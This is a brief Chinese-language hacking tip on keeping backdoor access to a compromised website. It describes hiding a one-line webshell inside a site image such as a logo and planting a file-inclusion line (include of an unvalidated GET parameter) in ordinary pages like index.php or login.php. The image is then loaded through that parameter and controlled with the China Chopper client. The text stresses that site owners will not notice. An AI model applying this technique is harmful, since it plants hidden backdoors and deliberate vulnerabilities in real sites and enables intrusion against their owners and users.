文件包含维持后门权限

在必备图片中插入一句话（logo等）

在正常页面进行文件包含（index.php login.php）

$x=$_GET['x'];

include($x);

站长不会神经病似的去看图片中是否含有后门代码

于是打开正常页面http://www.xxxx.com/news.php?x=xxxxxx.jpg

即可用菜刀链接

一般的站长不会看出来的